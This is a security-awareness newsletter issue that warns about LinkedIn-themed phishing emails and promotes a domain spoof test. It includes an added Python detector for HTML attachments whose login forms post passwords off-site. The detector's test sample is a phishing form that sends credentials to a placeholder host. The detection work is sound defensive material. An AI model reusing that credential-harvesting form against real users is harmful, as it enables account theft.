CyberheistNews Vol 5 #4 Jan 27, 2015 Scam Of The Week: LinkedIn Support Phishing Emails


Scam Of The Week: LinkedIn Support Phishing Emails

The scam is at least 15 years old if not more, but unfortunately this type of social engineering still works. Remind your users one more time that emails like this can hit their inbox at any time, because some modern spam techniques are able to bypass all the mail filters you have in place. I would send them this, or something close to it. Feel free to edit and send it to all employees and friends. (You could suggest they turn on LinkedIn's two-factor authentication.)

Recently, scammers have been attacking people with LinkedIn accounts using phishing e-mails claiming to be a LinkedIn Tech Support message. These fake e-mails state that "irregular activities" are happening on your LinkedIn account which require a mandatory security update of your account.

Obviously this is all a scam, and the purpose of the emails is to get you to fill out an attached HTML form which is a spoofed LinkedIn login page. What you fill out does not get you logged into the site but gets sent to the bad guys who then own your account.

You can recognize this scam because the email uses a lowercase "i" instead of a capital "I" when spelling "Linkedin". To see what the scam email looks like, check the picture at the KnowBe4 Blog. Remember: "When in doubt, throw it out!"
http://blog.knowbe4.com/scam-of-the-week-linkedin-support-phishing-emails

Despite all the software and hardware protection layers in place, things slip by on a regular basis. The bad guys have their own labs and run all the popular spam filters in-house, so they can test until they have a phishing attack that makes it through.

You really need a "human firewall" in place, so stepping your users through effective security awareness training is a must these days.
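For mail administrators, the attachment trick described above (an HTML file carrying a login form that submits somewhere other than LinkedIn) can also be checked mechanically. The following is an added example, not code from this newsletter or from KnowBe4: the sample message is constructed, the hosts are placeholders, the function names are hypothetical, and treating only linkedin.com as trusted is an assumption.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not a captured phish); all hosts are placeholders.
SAMPLE_EML = """\
From: "Linkedin Support" <support@mail.example>
Subject: Mandatory security update
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="update.html"

<form action="http://collector.example/post.php" method="post">
<input name="email"><input type="password" name="pass"></form>
--b1--
"""

class FormScanner(HTMLParser):
    """Records the action URL of each password field's enclosing form."""
    def __init__(self):
        super().__init__()
        self.action, self.hits = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        is_pw = tag == "input" and (a.get("type") or "").lower() == "password"
        if tag == "form":
            self.action = a.get("action") or ""
        elif is_pw and self.action is not None:
            self.hits.append(self.action)
    def handle_endtag(self, tag):
        self.action = None if tag == "form" else self.action

def on_trusted_host(url, trusted=("linkedin.com",)):
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in trusted)

def suspicious_attachments(raw):
    """(filename, form action) for HTML attachments that post a password off-site."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            scanner = FormScanner()
            scanner.feed(part.get_content())
            findings += [(part.get_filename(), u) for u in scanner.hits
                         if not on_trusted_host(u)]
    return findings
```

The host check compares the parsed hostname rather than searching the URL for "linkedin", so a lookalike such as linkedin.com.collector.example is still reported.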


Warm Regards,
Stu Sjouwerman



Quotes Of The Week

 

"You can tell more about a person by what he says about others than you can by what others say about him." - Audrey Hepburn

"If you can't explain it simply, you don't understand it well enough." - Albert Einstein

Security News

 

Can Bad Guys Impersonate Your Executives?

Can the bad guys impersonate one of your co-workers or your C-level execs? In other words, can your domain be spoofed? KnowBe4 can help you find out in one minute with our free Domain Spoof Test.

The Domain Spoof Test sheds light on a major potential vulnerability: email servers not being correctly configured. Bad guys using your organization's publicly available email addresses can attack your employees by impersonating (spoofing) a co-worker or executive.

We offer a free one-time Domain Spoof Test (DST) that verifies whether a hacker can disguise a malicious phishing email as a normal message from someone within your organization, such as a manager or CEO. If this is possible, hackers can easily launch a spear-phishing attack.

The only thing we do is send one email TO you, FROM you (spoofed). If you receive this email, bad guys can spoof your domain too. It takes 1 minute, so request the free domain spoof test for your own domain name. Click here and fill out the form:
https://info.knowbe4.com/domainspooftest-15-01-27

Exciting New Features We Recently Released

It's been a while since we released a full list of all recently added Kevin Mitnick Security Awareness Training features. It's getting to be a pretty exciting list! And know that this is purely based on feedback you have given us in your earlier survey answers. This is everything you need and nothing you don't. "For admins by admins", and as lean as possible. Check it out, you may not yet know about some new feature that you could use!
https://www.knowbe4.com/security-awareness-training-features/

Focus On Security Obscures Rise Of "Shadow IT"

Nearly three-quarters of IT security professionals are unaware of the amount of “shadow IT” within their organizations, according to a recent survey by the Cloud Security Alliance.

Shadow IT, according to CSA, is technology spending and implementation that occurs outside the IT department, including cloud apps adopted by individual employees, teams and business units. “Employees are more empowered than ever before to find and use cloud applications, often with limited or no involvement from the IT department,” according to the survey report, which interviewed 212 participants around the world in professional IT security roles.

Some organizations block certain cloud services altogether, such as those from Dropbox, Facebook, Apple iCloud, Tumblr, but that can be even riskier if employees seek out alternatives that have less mature security controls, CSA said. More:
https://gcn.com/articles/2015/01/20/shadow-it.aspx?s=gcntech_210115

Harvard Business Review Cybersecurity Article

President Obama’s new raft of proposals aims to address the growing concern that America is not taking tough-enough action against the increasing cybersecurity problem of nation-states and criminals (usually criminal gangs) attacking U.S. consumers and organizations.

The evildoers’ motivation for doing so is most often money, but intellectual property is also being filched, and the internet is also being used for anything from identity theft to illicit political objectives.

Good message at the end of this Harvard article: "Most important is education: Everyone — individuals, employees, companies, and boards of directors — needs to understand the new dangers." More:
https://hbr.org/2015/01/the-flaws-in-obamas-cybersecurity-initiative 

Watch two women fall in love with Tesla Model S P85D:

https://www.autoblog.com/2015/01/20/watch-two-women-in-love-tesla-model-s-p85d-video/

May The Best Robot Win! The new DARPA challenge - see this new hardware:
https://youtu.be/27HkxMo6qK0

Codebases - how many millions of lines of code in which product? Enlightening!
https://www.informationisbeautiful.net/visualizations/million-lines-of-code/     

                    
                                                  
 
                                           


